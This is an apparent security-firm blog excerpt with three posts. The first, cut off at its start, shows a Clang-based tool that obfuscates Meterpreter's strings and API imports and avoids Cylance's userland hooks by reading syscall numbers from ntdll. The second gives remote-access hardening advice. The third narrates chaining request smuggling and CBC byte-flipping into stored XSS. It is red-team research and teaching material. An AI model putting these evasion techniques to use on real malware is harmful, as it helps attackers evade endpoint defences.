char hid_extapi_rPiFTZW4ShwA[] = {'e','x','t','a','p','i','_','c','l','i','p','b','o','a','r','d','_','m','o','n'
char hid_extapi_05fAoaZLqOoy[] = {'e','x','t','a','p','i','_','c','l','i','p','b','o','a','r','d','_','m','o','n'
char hid_extapi_cOOyHTPTvZGK[] = {'e','x','t','a','p','i','_','c','l','i','p','b','o','a','r','d','_','m','o','n','i','t','o','r','_','s','t','o','p',0};
char hid_extapi_smtmvW05cI9y[] = {'e','x','t','a','p','i','_','c','l','i','p','b','o','a','r','d','_','m','o','n','i','t','o','r','_','d','u','m','p',0};
char hid_extapi_01kuYCM8z49k[] = {'e','x','t','a','p','i','_','a','d','s','i','_','d','o','m','a','i','n','_','q','u','e','r','y',0};
char hid_extapi_SMK9uFj6nThk[] = {'e','x','t','a','p','i','_','n','t','d','s','_','p','a','r','s','e',0};
char hid_extapi_PHxnGM7M0609[] = {'e','x','t','a','p','i','_','w','m','i','_','q','u','e','r','y',0};
char hid_extapi_J7EGS6FRHwkV[] = {'e','x','t','a','p','i','_','p','a','g','e','a','n','t','_','s','e','n','d','_','q','u','e','r','y',0};

Command customCommands[] =

    COMMAND_REQ(hid_extapi_UQOoNXigAPq4, request_window_enum),
    COMMAND_REQ(hid_extapi_vhFHmZ8u2hfz, request_service_enum),
    COMMAND_REQ(hid_extapi_pW25eeIGBeru, request_service_query),
    COMMAND_REQ(hid_extapi_S4Ws57MYBjib, request_service_control),
    COMMAND_REQ(hid_extapi_HJ0lD9Dl56A4, request_clipboard_get_data),
    COMMAND_REQ(hid_extapi_IiEzXils3UsR, request_clipboard_set_data),
    COMMAND_REQ(hid_extapi_czLOBo0HcqCP, request_clipboard_monitor_start),
    COMMAND_REQ(hid_extapi_WcWbTrsQujiT, request_clipboard_monitor_pause),
    COMMAND_REQ(hid_extapi_rPiFTZW4ShwA, request_clipboard_monitor_resume),
    COMMAND_REQ(hid_extapi_05fAoaZLqOoy, request_clipboard_monitor_purge),
    COMMAND_REQ(hid_extapi_cOOyHTPTvZGK, request_clipboard_monitor_stop),
    COMMAND_REQ(hid_extapi_smtmvW05cI9y, request_clipboard_monitor_dump),
    COMMAND_REQ(hid_extapi_01kuYCM8z49k, request_adsi_domain_query),
    COMMAND_REQ(hid_extapi_SMK9uFj6nThk, ntds_parse),
    COMMAND_REQ(hid_extapi_PHxnGM7M0609, request_wmi_query),
    COMMAND_REQ(hid_extapi_J7EGS6FRHwkV, request_pageant_send_query),

Hiding API Imports

Calling functions exported by external libraries causes the linker to write an entry into the Import Address Table (IAT). As a result, the function name will appear as clear-text within the binary, and thus can be recovered statically without even executing the malware. Of course, there are function names that are more suspicious than others. It would be wise to hide all the suspicious ones and keep the ones that are present in the majority of legitimate binaries.
For instance, in the kiwi extension of Metepreter, one can find the following line:

enumStatus = SamEnumerateUsersInDomain(hDomain, &EnumerationContext, 0, &pEnumBuffer, 100, &CountRetourned);

This function is exported by samlib.dll, so the linker will cause the strings “samlib.dll” and “SamEnumerateUsersInDomain” to appear in the compiled binary.

To solve this issue, it is possible to import the API at runtime using LoadLibrary / GetProcAddresss. Of course, both these functions work with strings, so they must be obfuscated as well. Thus, we would like to automatically rewrite the above snippet as follows:

typedef NTSTATUS(__stdcall* _SamEnumerateUsersInDomain)(
    SAMPR_HANDLE DomainHandle,
    PDWORD EnumerationContext,
    DWORD UserAccountControl,
    DWORD PreferedMaximumLength,
    PDWORD CountReturned
char hid_SAMLIB_01zmejmkLCHt[] = {'S','A','M','L','I','B','.','D','L','L',0};
char hid_SamEnu_BZxlW5ZBUAAe[] = {'S','a','m','E','n','u','m','e','r','a','t','e','U','s','e','r','s','I','n','D','o','m','a','i','n',0};
HANDLE hhid_SAMLIB_BZUriyLrlgrJ = LoadLibrary(hid_SAMLIB_01zmejmkLCHt);
_SamEnumerateUsersInDomain ffSamEnumerateUsersInDoma =(_SamEnumerateUsersInDomain)GetProcAddress(hhid_SAMLIB_BZUriyLrlgrJ, hid_SamEnu_BZxlW5ZBUAAe);
enumStatus = ffSamEnumerateUsersInDoma(hDomain, &EnumerationContext, 0, &pEnumBuffer, 100, &CountRetourned);

Rewriting syscalls

By default, using the migrate command of Meterpreter on a machine where Cylance is running triggers the antivirus detection (for now, just take our word for it). Cylance detects the process injection with a userland hook. To get around the detection, one can remove the hook, which seems to be the trending approach nowadays, or simply avoid it altogether. We found it simpler to read ntdll, recover the syscall number and insert it in a ready-to-call shellcode, which effectively gets around any antivirus’ userland’s hooks. To date, we have yet to find a Blue-Team that identifies NTDLL.DLL being read from disk as being “suspicious”.


All the aforementioned ideas can be implemented in a source code refactoring tool based on libTooling. This section documents the way we did it, which is a compromise between time available and patience with the lack of libTooling documentation. So, there is room for improvements, and in case something looks off to you, it probably is and we would love to hear about it.

Abstract Syntax Tree 101

A compiler typically comprises several components, the most common ones being a Parser and a Lexer. When source code is fed to the compiler, it first generates a Parse Tree out of the original source code (what the programmer wrote), and then adds semantic information to the nodes (what the compiler truly needs). The result of this step is called an Abstract Syntax Tree. Wikipedia showcases the following example:

while b ≠ 0
  if a > b
    a := a − b
    b := b − a
return a

A typical AST for this small program would look like this:

Example of an Abstract Syntax Tree (

This data structure allows for more precise algorithms when it comes to writing programs that understand properties of other programs, so it seems like a good choice to perform large scale code refactoring.

Clang’s Abstract Syntax Tree

Since we need to modify source code The Right WayTM, we will need to get acquainted with Clang‘s AST. The good news is that Clang exposes a command-line switch to dump the AST with pretty colours. The bad news is that for everything but toy projects, setting the correct compiler flags is… tricky.

For now, let us have a realistic yet simple enough test translation unit:

#include <windows.h>


int main(void)
    f_NtMapViewOfSection lNtMapViewOfSection;
    HMODULE ntdll;

    if (!(ntdll = LoadLibrary(TEXT("ntdll"))))
        return -1;

    lNtMapViewOfSection = (f_NtMapViewOfSection)GetProcAddress(ntdll, "NtMapViewOfSection");
    return 0;

Then, punch-in the following script into a .sh file (don’t ask how we came up with all those compiler flags, you will bring back painful memories):


clang -cc1 -ast-dump "$1" -D "_WIN64" -D "_UNICODE" -D "UNICODE" -D "_WINSOCK_DEPRECATED_NO_WARNINGS"\
  "-I" "$CLANG_PATH/include" \
  "-I" "$CLANG_PATH" \
  "-I" "$WIN_INCLUDE/Include/msvc-14.15.26726-include"\
  "-I" "$WIN_INCLUDE/Include/10.0.17134.0/ucrt" \
  "-I" "$WIN_INCLUDE/Include/10.0.17134.0/shared" \
  "-I" "$WIN_INCLUDE/Include/10.0.17134.0/um" \
  "-I" "$WIN_INCLUDE/Include/10.0.17134.0/winrt" \
  "-fdeprecated-macro" \
  "-w" \
  "-fno-use-cxa-atexit" "-fms-extensions" "-fms-compatibility" \
  "-fms-compatibility-version=19.15.26726" "-std=c++14" "-fdelayed-template-parsing" "-fobjc-runtime=gcc" "-fcxx-exceptions" "-fexceptions" "-fseh-exceptions" "-fdiagnostics-show-option" "-fcolor-diagnostics" "-x" "c++"

Notice that WIN_INCLUDE points to a folder containing all the required headers to interact with the Win32 API. These were taken as-is from a standard Windows 10 install, and to save you some headaches, we recommend that you do the same instead of opting for MinGW’s ones. Then, call the script with the test C file as argument. While this produces a 18MB file, it is easy enough to navigate to the interesting part of the AST by searching for one of the string literals we defined, for instance “NtMapViewOfSection“:

Now that we have a way to visualise the AST, it is much simpler to understand how we will have to update the nodes to achieve our result, without introducing any syntax errors in the resulting source code. The subsequent sections contain the implementation details related to AST manipulation with libTooling.

ClangTool boilerplate

Unsurprisingly, there is some required boilerplate code before getting into the interesting stuff, so punch-in the following code into main.cpp:

#include "clang/AST/ASTConsumer.h"
#include "clang/AST/ASTContext.h"
#include "clang/AST/Decl.h"
#include "clang/AST/Type.h"
#include "clang/ASTMatchers/ASTMatchFinder.h"
#include "clang/ASTMatchers/ASTMatchers.h"
#include "clang/Basic/SourceManager.h"
#include "clang/Frontend/CompilerInstance.h"
#include "clang/Frontend/FrontendAction.h"
#include "clang/Tooling/CommonOptionsParser.h"
#include "clang/Tooling/Tooling.h"
#include "clang/Rewrite/Core/Rewriter.h"

// LLVM includes
#include "llvm/ADT/ArrayRef.h"
#include "llvm/ADT/StringRef.h"
#include "llvm/Support/CommandLine.h"
#include "llvm/Support/raw_ostream.h"

#include "Consumer.h"
#include "MatchHandler.h"

#include <iostream>
#include <memory>
#include <string>
#include <vector>
#include <fstream>
#include <clang/Tooling/Inclusions/IncludeStyle.h>
#include <clang/Tooling/Inclusions/HeaderIncludes.h>
#include <sstream>

namespace ClSetup {
    llvm::cl::OptionCategory ToolCategory("StringEncryptor");

namespace StringEncryptor {

    clang::Rewriter ASTRewriter;
    class Action : public clang::ASTFrontendAction {

        using ASTConsumerPointer = std::unique_ptr<clang::ASTConsumer>;

        ASTConsumerPointer CreateASTConsumer(clang::CompilerInstance &Compiler,
                                             llvm::StringRef Filename) override {

            ASTRewriter.setSourceMgr(Compiler.getSourceManager(), Compiler.getLangOpts());
            std::vector<ASTConsumer*> consumers;

            // several passes can be combined together by adding them to `consumers`
            auto TheConsumer = llvm::make_unique<Consumer>();
            TheConsumer->consumers = consumers;
            return TheConsumer;

        bool BeginSourceFileAction(clang::CompilerInstance &Compiler) override {
            llvm::outs() << "Processing file " << '\n';
            return true;

        void EndSourceFileAction() override {

            clang::SourceManager &SM = ASTRewriter.getSourceMgr();

            std::string FileName = SM.getFileEntryForID(SM.getMainFileID())->getName();
            llvm::errs() << "** EndSourceFileAction for: " << FileName << "\n";

            // Now emit the rewritten buffer.
            llvm::errs() << "Here is the edited source file :\n\n";
            std::string TypeS;
            llvm::raw_string_ostream s(TypeS);
            auto FileID = SM.getMainFileID();
            auto ReWriteBuffer = ASTRewriter.getRewriteBufferFor(FileID);

            if(ReWriteBuffer != nullptr)
                llvm::errs() << "File was not modified\n";

            std::string result = s.str();
            std::ofstream fo(FileName);
                fo << result;
                llvm::errs() << "[!] Error saving result to " << FileName << "\n";

auto main(int argc, const char *argv[]) -> int {

    using namespace clang::tooling;
    using namespace ClSetup;

    CommonOptionsParser OptionsParser(argc, argv, ToolCategory);
    ClangTool Tool(OptionsParser.getCompilations(),

    auto Action = newFrontendActionFactory<StringEncryptor::Action>();

Since that boilerplate code is taken from examples in the official documentation, there is no need to describe it further. In fact, the only modification worth mentioning is inside CreateASTConsumer. Our end game is to run several tranformation passes on the same translation unit. It can be done by adding items to the consumers collection (the essential line is consumers.push_back(&...);).

String obfuscation

This section describes the most important implementation details regarding the string obfuscation pass, which comprises three steps:

  • Locate string literals in the source code.
  • Replace them with variables
  • Insert a variable definition / assignment at the appropriate location (enclosing function or global context).

Locating string literals in source code

StringConsumer can be defined as follows (at the beginning of the StringEncryptor namespace):

class StringEncryptionConsumer : public clang::ASTConsumer {

    void HandleTranslationUnit(clang::ASTContext &Context) override {
        using namespace clang::ast_matchers;
        using namespace StringEncryptor;

        llvm::outs() << "[StringEncryption] Registering ASTMatcher...\n";
        MatchFinder Finder;
        MatchHandler Handler(&ASTRewriter);

        const auto Matcher = stringLiteral().bind("decl");

        Finder.addMatcher(Matcher, &Handler);

StringEncryptionConsumer StringConsumer = StringEncryptionConsumer();

Given a translation unit, we can tell Clang to find a pattern inside the AST, as well as register a “handler” to be called whenever a match is found. The pattern matching exposed by Clang’s ASTMatcher is quite powerful, and yet underused here, since we only resort to it to locate string literals.

Then, we can get to the heart of the matter by implementing a MatchHandler, which will provide us with a MatchResult instance. A MatchResult contains a reference to the AST node identified, as well as priceless context information.

Let us implement the class definition and inherit some good stuff from clang::ast_matchers::MatchFinder::MatchCallback:


#include <vector>
#include <string>
#include <memory>
#include "llvm/Support/raw_ostream.h"
#include "llvm/Support/CommandLine.h"
#include "llvm/ADT/StringRef.h"
#include "llvm/ADT/ArrayRef.h"
#include "clang/Rewrite/Core/Rewriter.h"
#include "clang/Tooling/Tooling.h"
#include "clang/Tooling/CommonOptionsParser.h"
#include "clang/Frontend/FrontendAction.h"
#include "clang/Frontend/CompilerInstance.h"
#include "clang/Basic/SourceManager.h"
#include "clang/ASTMatchers/ASTMatchers.h"
#include "clang/ASTMatchers/ASTMatchFinder.h"
#include "clang/AST/Type.h"
#include "clang/AST/Decl.h"
#include "clang/AST/ASTContext.h"
#include "clang/AST/ASTConsumer.h"
#include "MatchHandler.h"

class MatchHandler : public clang::ast_matchers::MatchFinder::MatchCallback {

    using MatchResult = clang::ast_matchers::MatchFinder::MatchResult;

    MatchHandler(clang::Rewriter *rewriter);
    void run(const MatchResult &Result) override; // callback function that runs whenever a Match is found.



In MatchHandler.cpp, we will have to implement MatchHandler’s constructor and the run callback function. The constructor is pretty simple, since it is only needed to store the clang::Rewriter‘s instance for later use:

using namespace clang;

MatchHandler::MatchHandler(clang::Rewriter *rewriter) {
    this->ASTRewriter = rewriter;

run is implemented as follows:

void MatchHandler::run(const MatchResult &Result) {
    const auto *Decl = Result.Nodes.getNodeAs<clang::StringLiteral>("decl");
    clang::SourceManager &SM = ASTRewriter->getSourceMgr();

    // skip strings in included headers
    if (!SM.isInMainFile(Decl->getBeginLoc()))

    // strings that comprise less than 5 characters are not worth the effort
    if (!Decl->getBytes().str().size() > 4) {

    climbParentsIgnoreCast(*Decl, clang::ast_type_traits::DynTypedNode(), Result.Context, 0);

From the excerpt shown above, there are three elements worth mentioning:

  • We extract the AST node that was matched by the pattern defined in StringEncryptionConsumer. To do that, one can call the function getNodeAs, which expects a string as argument that relates to the identifier the pattern was bound to (see the line const auto Matcher = stringLiteral().bind("decl"))
  • We skip strings that are not defined in the translation unit under analysis. Indeed, our pass intervenes after Clang‘s preprocessor, which will actually copy-paste included system headers into the translation unit.
  • Then, we are ready to process the string literal. Since we need to know about the context where this string literal was found, we pass the extracted node to a user-defined function, (climbParentsIgnoreCast in this case, for the lack of a better name), along Result.Context, which contains a reference to the enclosing AST. The goal is to visit the tree upwards until an interesting node is found. In this case, we are interested in a node of type CallExpr.
MatchHandler::climbParentsIgnoreCast(const StringLiteral &NodeString, clang::ast_type_traits::DynTypedNode node,
                                     clang::ASTContext *const pContext, uint64_t iterations) {

    ASTContext::DynTypedNodeList parents = pContext->getParents(NodeString);

    if (iterations > 0) {
        parents = pContext->getParents(node);

    for (const auto &parent : parents) {

        StringRef ParentNodeKind = parent.getNodeKind().asStringRef();

        if (ParentNodeKind.find("Cast") != std::string::npos) {

            return climbParentsIgnoreCast(NodeString, parent, pContext, ++iterations);

        handleStringInContext(&NodeString, pContext, parent);

    return false;

In a nutshell, this function recursively looks up the parent nodes of a StringLiteral node, until it finds one that should be interesting (i.e. not a “cast”). handleStringInContext is also straight-forward:

void MatchHandler::handleStringInContext(const clang::StringLiteral *pLiteral, clang::ASTContext *const pContext,
                                         const clang::ast_type_traits::DynTypedNode node) {

    StringRef ParentNodeKind = node.getNodeKind().asStringRef();

    if ("CallExpr") == 0) {
        handleCallExpr(pLiteral, pContext, node);
    } else if ("InitListExpr") == 0) {
        handleInitListExpr(pLiteral, pContext, node);
    } else {
        llvm::outs() << "Unhandled context " << ParentNodeKind << " for string " << pLiteral->getBytes() << "\n";

As evident from the snippet above, only two kind of nodes are actually handled. It should also be quite easy to add more if needed. Indeed, both cases are already handled in a similar fashion.

void MatchHandler::handleCallExpr(const clang::StringLiteral *pLiteral, clang::ASTContext *const pContext,
                                  const clang::ast_type_traits::DynTypedNode node) {

    const auto *FunctionCall = node.get<clang::CallExpr>();

    if (isBlacklistedFunction(FunctionCall)) {
        return; // exclude printf-like functions when the replacement is not constant anymore (C89 standard...).

    handleExpr(pLiteral, pContext, node);

void MatchHandler::handleInitListExpr(const clang::StringLiteral *pLiteral, clang::ASTContext *const pContext,
                                      const clang::ast_type_traits::DynTypedNode node) {

    handleExpr(pLiteral, pContext, node);

Replacing string literals

Since both CallExpr and InitListExpr can be handled in a similar fashion, we define a common function usable by both.

bool MatchHandler::handleExpr(const clang::StringLiteral *pLiteral, clang::ASTContext *const pContext,
                                  const clang::ast_type_traits::DynTypedNode node) {

    clang::SourceRange LiteralRange = clang::SourceRange(

    if(shouldAbort(pLiteral, pContext, LiteralRange))
        return false;

    std::string Replacement = translateStringToIdentifier(pLiteral->getBytes().str());

    if(!insertVariableDeclaration(pLiteral, pContext, LiteralRange, Replacement))
        return false ;


    return replaceStringLiteral(pLiteral, pContext, LiteralRange, Replacement);
  • We randomly generate a variable name.
  • Find some empty space at the nearest location and insert the variable declaration. This is basically a wrapper around ASTRewriter->InsertText().
  • Replace the string with the identifier generated in step 1.
  • Add the string literal location to a collection. This is useful because when visiting InitListExpr, the same string literal will appear twice (no idea why).

The last step is the only one that is tricky to implement really, so let us focus on that first:

bool MatchHandler::replaceStringLiteral(const clang::StringLiteral *pLiteral, clang::ASTContext *const pContext,
                                        clang::SourceRange LiteralRange,
                                        const std::string& Replacement) {

    // handle "TEXT" macro argument, for instance LoadLibrary(TEXT("ntdll"));
    bool isMacro = ASTRewriter->getSourceMgr().isMacroBodyExpansion(pLiteral->getBeginLoc());

    if (isMacro) {
        StringRef OrigText = clang::Lexer::getSourceText(CharSourceRange(pLiteral->getSourceRange(), true),
                                                         pContext->getSourceManager(), pContext->getLangOpts());

        // weird bug with TEXT Macro / other macros...there must be a proper way to do this.
        if (OrigText.find("TEXT") != std::string::npos) {


    return ASTRewriter->ReplaceText(LiteralRange, Replacement);

Normally, replacing text should be realised with the ReplaceText API, but in practice too many bugs were encountered with it. When it comes to macros, things tend to get very complicated because Clang’s API behaves inconsistently. For instance, if you remove the check isMacroBodyExpansion(), you will end up replacing “TEXT” instead of its argument.

For instance in LoadLibrary(TEXT("ntdll")), the actual result would be LoadLibrary(your_variable("ntdll")), which is incorrect.

The reason for this is that TEXT is a macro that, when handled by the Clang’s preprocessor, is replaced with L"ntdll". Our transformation pass happens after the preprocessor has done its job, so querying the start and end locations of the token “ntdll” will yield values that are off by a few characters, and are not useful to us. Unfortunately, querying the actual locations in the original translation unit is a kind of black magic with Clang’s API, and the working solution was found with trial-and-error, sorry.

Inserting a variable declaration at the nearest empty location

Now that we are able to replace string literals with variable identifiers, the goal is to define that variable and assign it with the value of the original string. In short, we want the patched source code to contain char your_variable[] = "ntdll", without overwriting anything.

There can be two scenarios:

  • The string literal is located within a function body.
  • The string literal is located outside a function body.

The latter is the most straightforward, since it is only needed to find the start of the expression where the string literal is used.

For the former, we need to find the enclosing function. Then, Clang exposes an API to query the start location of the function body (after the first bracket). This is an ideal place to insert a variable declaration because the variable will be visible in the entire function, and the tokens that we insert will not overwrite stuff.

In any case, both situations are solved by visiting every parent node until a node of type FunctionDecl or VarDecl is found:

MatchHandler::findInjectionSpot(clang::ASTContext *const Context, clang::ast_type_traits::DynTypedNode Parent,
                                const clang::StringLiteral &Literal, bool IsGlobal, uint64_t Iterations) {

    if (Iterations > CLIMB_PARENTS_MAX_ITER)
        throw std::runtime_error("Reached max iterations when trying to find a function declaration");

    ASTContext::DynTypedNodeList parents = Context->getParents(Literal);;

    if (Iterations > 0) {
        parents = Context->getParents(Parent);

    for (const auto &parent : parents) {

        StringRef ParentNodeKind = parent.getNodeKind().asStringRef();

        if (ParentNodeKind.find("FunctionDecl") != std::string::npos) {
            auto FunDecl = parent.get<clang::FunctionDecl>();
            auto *Statement = FunDecl->getBody();
            auto *FirstChild = *Statement->child_begin();
            return {FirstChild->getBeginLoc(), FunDecl->getEndLoc()};

        } else if (ParentNodeKind.find("VarDecl") != std::string::npos) {

            if (IsGlobal) {
                return parent.get<clang::VarDecl>()->getSourceRange();

        return findInjectionSpot(Context, parent, Literal, IsGlobal, ++Iterations);


git clone
mkdir avcleaner/CMakeBuild && cd avcleaner/CMakeBuild
cmake ..
cd ..
bash test/string_simplest.c

As you can see, this works pretty well. Now, this example was simple enough that it could have been solved with regexes and way fewer lines of codes. However, even though we are delighted to count the king of regexes (
@1mm0rt411 himself) among our ranks, it would have been unfair to challenge him with a task as pesky as string obfuscation in Meterpreter.

Going further

For now, strings are not actually encrypted, in spite of the obfuscation pass being named “StringEncryptor”. How much effort is really needed to actually encrypt the strings? Spoiler: a few more hours, but it is a tradition to leave some exercices for the reader 😉

In addition, @TheColonial recently (April 2020) updated Meterpreter so that it can be compiled with more recent versions of Visual Studio. It means that it should be possible to move on from the C89 standard and handle more corner cases, such as obfuscating the first argument to format string functions.

To be continued…

As this post is already kind of lengthy, it was decided to split it into several parts. In fact, obfuscating strings was the easy part implementation-wise, although you need to be extremely familiar with Clang‘s API. Its documentation being the source code, we recommend allocating a week or two to ingest it as a whole 😛 (and then don’t hesitate to reach out to a specialist for mental health recovery).

The next blog post will be about hiding API Imports automatically.


Vladimir Meier

SCRT on Covid-19 and Remote Access / Working From Home

Like everybody, SCRT has been adjusting to life under Covid-19 over the last weeks. Thankfully, we’ve been prepared for working from home for quite some time now as many of us do so during normal circumstances anyways. This is however not the case for all companies and we’ve unfortunately been called in to help some of them deal with the unwanted consequences of poorly setting up their remote access (read: they got hacked). So here is a quick blog post detailing the main issues we see with remote access systems and what can be done to avoid them.

From an attacker’s perspective, there are essentially three ways of exploiting a remote access system to reach a company’s internal network:

  1. Compromise the device of an end user and wait until he or she legitimately connects to the system to either steal the credentials or the session
  2. Compromise valid credentials
  3. Compromise the remote access system itself

When we look at it this way, most people will probably be wary of the end user devices connecting to the corporate network as a “new” attack vector since everybody is working from home. But before getting into that, I want to mention the other categories first, as up to now they have been the ones which have been causing the most problems (that we have seen).

Compromising valid credentials

Whatever the remote access system you have setup, whether it be a simple RDP server exposed to the Internet, a Citrix Netscaler or any flavour of SSL-VPN, if the users connecting to them use a single authentication factor (a password), their accounts will get compromised and attackers will gain access to the system. It’s as simple as that.

Some people might be thinking that a “complex” password policy and rotating passwords every few months will avoid this, but the truth is there is always someone within the company who will be using Geneva2020! (supposing your company is based in Geneva) as their password. A decent attacker will quickly find the appropriate account and connect to the system with it.

The only solution here is implementing a second authentication factor. Microsoft wrote a nice post about passwords which can be found here, which shows pretty well why any other measure will be ineffective.

Not all authentication factors are born equal though and there are differences between tokens, certificates or SMSs but whatever the second factor is, it will be better than relying on a single password. If a machine certificate is used as an authentication factor, it does have the advantage of being “unphishable”, unlike any other factor which has to be entered by the user.

So the first recommendation, which shouldn’t come as a surprise, is to implement Multi-Factor Authentication (MFA) for your remote access system. Even if it obviously doesn’t provide perfect security, it is a big step in the right direction.

Compromising the Remote Access System

If 2019 taught us anything, it’s that remote access systems are not as secure as vendors will try to make us believe. Last year, most SSL-VPN vendors were hit by at least one serious vulnerability allowing attackers to break into the protected network:

  • Netscaler (CVE-2019-19781)
  • Fortinet (CVE-2018-13382)
  • Pulse Secure (CVE-2019-11510)
  • SonicWall (CVE-2019-7482)
  • Palo Alto (no CVE)

Let’s add to that Bluekeep (CVE-2019-0708) for RDP and we’ve already got a lot of systems covered. And these are just the ones that were made public!

So the second takeaway here is to always ensure your remote access systems are up to date. Vulnerabilities in these systems have important consequences and are usually very quickly exploited, so make sure you have a way of being notified when a new patch is available and apply it as soon as possible.

Compromising an end user device

And now we get to the final aspect of this post which is attempting to secure your systems from potentially compromised end user devices. In many cases, companies are now allowing employees to remotely connect to the corporate network with their own personal devices on which the company has absolutely no control. There might not even be AppLocker on the device!

The bottom line is that unfortunately, if a compromised device is used to connect to a remote access system, an attacker can pretty much do anything the legitimate user can. Whether you have multi-factor authentication setup or not will not protect you against this. For example, an attacker can simply wait for the legitimate user to authenticate to the SSL-VPNs Web interface and then steal the generated session cookie. If the cookie is bound to the user’s IP address, the attacker can proxy his/her connections through the victim’s workstation.

Preventing a device from being compromised in the first place entirely depends on the end user (in the case where he or she is using their own personal device). Awareness trainings can help, though often only employees who are interested in the subject and therefore need it the least attend unless they are mandatory. Nevertheless, talking about the subject and discussing cases with employees, and therefore integrating them into the company’s defense mechanism will raise awareness and increase the chances of at least detecting the attacks.

MELANI wrote a short document on how users can protect themselves which can be found here. It covers several topics, but I’d say the main recommendation is that if it is at all possible, have a separate work computer from your private one and make sure nobody else uses it.

Protecting against a compromised private device is akin to protecting against a malicious insider. Much like dealing with Covid19, there are mainly two options here:

  • Isolation
  • Detection

This is not rocket science, but most companies still have a hard time properly segmenting their internal network and implementing strict firewall rules, which makes it difficult to truly isolate a malicious user. On the upside, these are issues which all companies should be tackling, whether it’s due to the current situation leading to increased Work from Home, or not.

When I say isolation, I essentially mean applying the least-privilege principle and ensuring a user only has access to what he or she absolutely needs in order to work efficiently. In this way, even if the user’s device is compromised, the attacker can still only access what the user has access to.

When it comes to detection, it is all about detecting patterns of actions which deviate from the norm. Why is someone from IT suddenly attempting to read files on the accounting share? Probably because it’s not really them doing it! This requires some kind of base for comparison, and some intelligence to detect the outliers. A flurry of solutions based, for example, on machine learning techniques exist to do this, but I won’t go so far as to recommend one over the other.

Summary (TL;DR)

So to summarize the contents of this post, my recommendations to secure a remote access solution are:

  • Use multiple authentication factors, and if possible one which is unknown to the user
  • Make sure your remote access solution is up to date
  • Have your employees use a dedicated machine for accessing the network whenever possible
  • Apply the least privileges principle and restrict access to the strict minimum for all users
  • Detect abnormal patterns and behaviours

Without working on these aspects, companies will essentially be blind and very vulnerable to attacks targeting these remote access solutions.

Combining Request Smuggling and CBC Byte-flipping to stored-XSS

During a recent penetration test we stumbled upon a couple of issues which independently might not have warranted any attention, but when combined allowed to compromise other users by injecting arbitrary JavaScript into their browsers. It goes to show that even certain issues which might not always seem particularly interesting (such as self-XSS) can sometimes be exploited in meaningful ways. I’ll keep this mostly theoretical so as not to divulge any information on the actual targeted system.

The first interesting behaviour we noticed during the assessment was related to the authentication mechanism. When logging in with a valid user account, the application would generate a base64-encoded session cookie which always started with the same values but had differing endings. This often happens when the cookie contains some kind of encrypted information related to the account and a timestamp to define how long the cookie is valid. Given the fact that the start of the cookie was always the same, it pointed to the fact that the encryption mode was either ECB or CBC with a static IV.

The web application actually decrypts the content of the cookie to display the username on the main page. The latter was discovered by attempting a CBC byte-flipping attack which allowed us to see certain blocks of scrambled text in the resulting page.

In this particular case, we weren’t able to generate arbitrary accounts to force the creation of arbitrary cookies, but we did notice a particularly strange behaviour in the authentication mechanism which allowed us to generate semi-arbitrary cookies anyways, which would in turn allow us to generate encrypted blocks for values we could use to inject JavaScript into the page.

It turns out that if we could login with an account named test, it was also possible to login with an account named ./toto/titi/../../test. This username was accepted with the same password as the original one. There is most certainly some other vulnerability here (path traversal or XPath injection maybe?), but given the limited time of the assessment, we weren’t able to exploit it in any other way than the one detailed below.

Given the “name traversal” issue, we could essentially generate encrypted cookies with arbitrary blocks. Since some of these blocks are then decrypted and shown in the web page, we were then able to force the generation of blocks which would result in a self-XSS. Obviously when we first noticed that the username was reflected in the page we attempted to inject JavaScript code directly into the username, but this was actually rejected by the application, so the only way of exploiting the issue was through the manipulation of the encrypted cookie, as its decrypted value was not sanitized. Unfortunately, this would only impact ourselves, unless we found a way to set another browser’s cookie to our malicious value.

This is where Burp’s request smuggler plugin came in handy, as while we were busy encrypting cookies, it also revealed that the web application was vulnerable to a request smuggling vulnerability. This type of vulnerability gives an attacker the ability to prepend another user’s HTTP request to the web application. This is where our previous discoveries related to the cookie parsing came in handy, as the request smuggling issue allowed us to specify the URL and headers of a subsequent request from another browser. In essence, this allows us to specify the cookie used by another browser for one request (although it could be repeated multiple times).

So, by exploiting this issue, we can send our malicious cookie to another user’s browser and therefore have our decrypted malicious javaScript code executed in his browser. That particular page would be rendered with our own cookie and privileges, but any further request would keep the browser’s original cookie and privileges (as long as we don’t perform another smuggling attack…). This would therefore allow our script to interact with the affected domain in any way the legitimate user could. Our Self-XSS was therefore transformed into a stored-XSS! A very restrictive CSP could have made our life harder, but in this case there was none.

I hope this quick post can give you other ideas to exploit weird and seemingly unrelated issues such as these in your own assessments!